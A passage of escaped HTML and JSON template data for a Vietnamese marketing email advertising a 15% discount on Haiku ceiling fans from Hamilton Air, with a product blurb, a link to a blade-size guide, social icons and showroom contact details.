(mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681813445393-HaikuL_1000Res_Caramel_White.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #e03e2d; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'comic sans ms\', sans-serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>Sale Off 15%<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 20px; font-weight: 400; color: #34495e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 28px;\\\">L\\u1ef0A CH\\u1eccN QU\\u1ea0T TR\\u1ea6N \\u0110\\u00daNG C\\u00c1CH<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"48%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #34495e;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi 03 \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh, 03 t\\u00f9y ch\\u1ecdn l\\u1eafp \\u0111\\u1eb7t v\\u00e0 nhi\\u1ec1u lo\\u1ea1i c\\u00f3 s\\u1eb5n<br \\/>gi\\u1ea3m chi\\u1ec1u d\\u00e0i, Haiku l\\u00e0 m\\u1ed9t gi\\u1ea3i ph\\u00e1p tho\\u1ea3i m\\u00e1i tao nh\\u00e3 cho h\\u1ea7u nh\\u01b0 b\\u1ea5t k\\u1ef3<br \\/>kh\\u00f4ng gian, t\\u1eeb c\\u0103n h\\u1ed9 studio \\u1ea5m c\\u00fang cho \\u0111\\u1ebfn m\\u00e1i hi\\u00ean ngo\\u00e0i tr\\u1eddi.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/drive.google.com\\/file\\/d\\/1M827CJDInvngku46rJxTUGe2U_b5PTZp\\/view\\\" style=\\\"height:37px; v-text-anchor:middle; width:393px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#236fa1;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/drive.google.com\\/file\\/d\\/1M827CJDInvngku46rJxTUGe2U_b5PTZp\\/view\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #236fa1; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM H\\u01af\\u1edaNG D\\u1eaaN L\\u1ef0A CH\\u1eccN S\\u1ea2I C\\u00c1NH PH\\u00d9 H\\u1ee2P ?<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a5726e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"line-height: 19.6px; font-size: 14px;\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"28%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #ca979a;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:183px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"183\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:183px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/soundcloud.com\\/\\\" title=\\\"SoundCloud\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/soundcloud.png\\\" alt=\\\"SoundCloud\\\" title=\\\"SoundCloud\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 150%;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: <a rel=\\\"noopener\\\" href=\\\"mailto:sale@hogiaphat.vn\\\" target=\\\"_blank\\\">sale@hogiaphat.vn\\u00a0<\\/a><\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">-----------o0o------------<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\"><strong>C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<\\/strong><br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #a47e6b;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #a47e6b;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Too many emails?\\u00a0<a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"> <span style=\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\">Unsubscribe<\\/span><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":8,\\\"u_column\\\":9,\\\"u_content_text\\\":11,\\\"u_content_image\\\":5,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4,\\\"u_content_html\\\":1,\\\"u_content_menu\\\":1},\\\"body\\\":{\\\"id\\\":\\\"0u7zmWfe6N\\\",\\\"rows\\\":[{\\\"id\\\":\\\"mzyaBaFj3Q\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"U5J6RuT_G3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PU1AcFTaVA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 5px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\",\\\"width\\\":980,\\\"height\\\":130},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IujIkibZVI\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 